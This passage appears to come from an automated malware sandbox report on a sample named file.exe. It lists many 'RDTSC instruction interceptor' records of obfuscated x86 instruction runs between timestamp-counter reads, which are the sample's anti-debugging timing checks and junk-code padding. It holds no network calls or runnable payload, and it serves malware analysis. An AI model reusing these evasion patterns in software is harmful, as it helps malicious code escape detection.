              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CACA2 second address: 7CACA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAE18 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 4348974Ah 0x00000012 clc 0x00000013 push dword ptr [ebp+122D169Dh] 0x00000019 ja 00007F292CD65AB3h 0x0000001f call dword ptr [ebp+122D2B67h] 0x00000025 pushad 0x00000026 jnl 00007F292CD65AB0h 0x0000002c pushad 0x0000002d mov si, 008Ch 0x00000031 mov dx, 773Dh 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 jmp 00007F292CD65AB0h 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 mov dword ptr [ebp+122D318Bh], edi 0x00000047 mov dword ptr [ebp+122D3B33h], eax 0x0000004d mov dword ptr [ebp+122D3442h], eax 0x00000053 cmc 0x00000054 mov esi, 0000003Ch 0x00000059 jng 00007F292CD65AAEh 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 js 00007F292CD65AACh 0x00000069 mov dword ptr [ebp+122D318Bh], ecx 0x0000006f lodsw 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jmp 00007F292CD65AACh 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D30E3h], ebx 0x00000085 nop 0x00000086 jg 00007F292CD65AB0h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 pushad 0x00000091 popad 0x00000092 jp 00007F292CD65AA6h 0x00000098 popad 0x00000099 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD41 second address: 7CFD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD47 second address: 7CFD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAF1 second address: 7CEAFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAFB second address: 7CEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAFF second address: 7CEB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF080 second address: 7CF086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF086 second address: 7CF08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF08A second address: 7CF08E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF08E second address: 7CF09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F292CD152EAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF09E second address: 7CF0A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF61A second address: 7CF621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF621 second address: 7CF62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F292CD65AA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF77A second address: 7CF786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF786 second address: 7CF7BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F292CD65AB5h 0x00000011 jo 00007F292CD65AA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7BD second address: 7CF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7C3 second address: 7CF7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F292CD65AB3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7DE second address: 7CF7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7E3 second address: 7CF7EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D45AD second address: 7D45B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D45B4 second address: 7D45BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4755 second address: 7D4780 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD152E6h 0x00000008 jmp 00007F292CD152F3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F292CD152F2h 0x00000015 jne 00007F292CD152E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4780 second address: 7D479A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F292CD65AAEh 0x0000000a jl 00007F292CD65AA6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D479A second address: 7D479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4ABA second address: 7D4AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB5h 0x00000007 jnl 00007F292CD65AAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F292CD65AA6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AEC second address: 7D4AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AF0 second address: 7D4AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AFC second address: 7D4B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C70 second address: 7D4C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F292CD65AB4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C8B second address: 7D4CA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D41D5 second address: 7D41E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 je 00007F292CD65AA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D550A second address: 7D550F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D550F second address: 7D5515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9CCD second address: 7D9CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9CD3 second address: 7D9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B44 second address: 7A3B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B48 second address: 7A3BAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jng 00007F292CD65AA6h 0x00000010 pop edx 0x00000011 jmp 00007F292CD65AB8h 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F292CD65AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push eax 0x00000033 xor ecx, 6966F501h 0x00000039 pop edi 0x0000003a lea eax, dword ptr [ebp+12487865h] 0x00000040 mov dword ptr [ebp+122D58FDh], edi 0x00000046 push eax 0x00000047 js 00007F292CD65AB0h 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3BAF second address: 78087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F292CD152E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dx, 583Bh 0x00000028 call dword ptr [ebp+122D2347h] 0x0000002e ja 00007F292CD15315h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F292CD152EDh 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4022 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 ja 00007F292CD65AA7h 0x0000000e push dword ptr [ebp+122D169Dh] 0x00000014 mov cx, 1F71h 0x00000018 call dword ptr [ebp+122D2B67h] 0x0000001e pushad 0x0000001f jnl 00007F292CD65AB0h 0x00000025 xor eax, eax 0x00000027 jmp 00007F292CD65AB0h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 mov dword ptr [ebp+122D318Bh], edi 0x00000036 mov dword ptr [ebp+122D3B33h], eax 0x0000003c mov dword ptr [ebp+122D3442h], eax 0x00000042 cmc 0x00000043 mov esi, 0000003Ch 0x00000048 jng 00007F292CD65AAEh 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 js 00007F292CD65AACh 0x00000058 mov dword ptr [ebp+122D318Bh], ecx 0x0000005e lodsw 0x00000060 cmc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 jmp 00007F292CD65AACh 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D30E3h], ebx 0x00000074 nop 0x00000075 jg 00007F292CD65AB0h 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 jp 00007F292CD65AA6h 0x00000087 popad 0x00000088 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A40C0 second address: 7A4116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F292CD152EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jnc 00007F292CD152FCh 0x0000001a jnl 00007F292CD152ECh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4116 second address: 7A4122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4122 second address: 7A4127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4127 second address: 7A4197 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F292CD65AACh 0x00000008 jng 00007F292CD65AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F292CD65AAAh 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f call 00007F292CD65AB4h 0x00000024 jl 00007F292CD65AA9h 0x0000002a pop ecx 0x0000002b mov edx, ecx 0x0000002d call 00007F292CD65AA9h 0x00000032 jg 00007F292CD65ABDh 0x00000038 pushad 0x00000039 jmp 00007F292CD65AB3h 0x0000003e push eax 0x0000003f pop eax 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007F292CD65AA8h 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4197 second address: 7A419D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A419D second address: 7A41A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41A1 second address: 7A41C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F292CD152EEh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F292CD152EAh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41C9 second address: 7A41D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F292CD65AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41D4 second address: 7A41E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41E4 second address: 7A41EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41EA second address: 7A41EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41EF second address: 7A41F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A41F5 second address: 7A41F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A42B2 second address: 7A42B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4420 second address: 7A444A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F292CD152E6h 0x00000009 jmp 00007F292CD152F8h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A444A second address: 7A444E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A444E second address: 7A4452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4452 second address: 7A4469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F292CD65AA8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4469 second address: 7A4479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4479 second address: 7A447F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A447F second address: 7A4483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4483 second address: 7A44B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F292CD65AB2h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4B40 second address: 7A4B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4F10 second address: 7A4F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4F15 second address: 7A4F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4F1B second address: 7A4F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4F1F second address: 7A4FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007F292CD152ECh 0x00000013 jmp 00007F292CD152F0h 0x00000018 popad 0x00000019 nop 0x0000001a jng 00007F292CD152EBh 0x00000020 or dx, 9994h 0x00000025 lea eax, dword ptr [ebp+124878A9h] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F292CD152E8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 cmc 0x00000046 jmp 00007F292CD152F2h 0x0000004b push eax 0x0000004c jmp 00007F292CD152EBh 0x00000051 mov dword ptr [esp], eax 0x00000054 mov dword ptr [ebp+122D2962h], ecx 0x0000005a lea eax, dword ptr [ebp+12487865h] 0x00000060 mov edx, dword ptr [ebp+122D2D47h] 0x00000066 add cx, B427h 0x0000006b nop 0x0000006c push esi 0x0000006d push ebx 0x0000006e push esi 0x0000006f pop esi 0x00000070 pop ebx 0x00000071 pop esi 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4FD0 second address: 7A4FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4FD4 second address: 7A4FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4FDA second address: 781515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F292CD65AA6h 0x00000009 jmp 00007F292CD65AB0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F292CD65AA8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, 00C88D64h 0x00000031 call dword ptr [ebp+122D194Dh] 0x00000037 pushad 0x00000038 push ebx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b push edi 0x0000003c pop edi 0x0000003d pop ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0D5 second address: 7DA0E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0E4 second address: 7DA0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F292CD65AACh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0F7 second address: 7DA11B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F292CD152E6h 0x00000009 jmp 00007F292CD152EAh 0x0000000e jne 00007F292CD152E6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F292CD152E6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA26F second address: 7DA28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD65AB9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA28C second address: 7DA2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA5A2 second address: 7DA5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD65AAFh 0x00000009 jnl 00007F292CD65AA6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA5BB second address: 7DA5C5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAA45 second address: 7DAA80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB7h 0x00000010 jng 00007F292CD65AA6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a jns 00007F292CD65AA6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF811 second address: 7DF81F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F292CD152E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF81F second address: 7DF823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
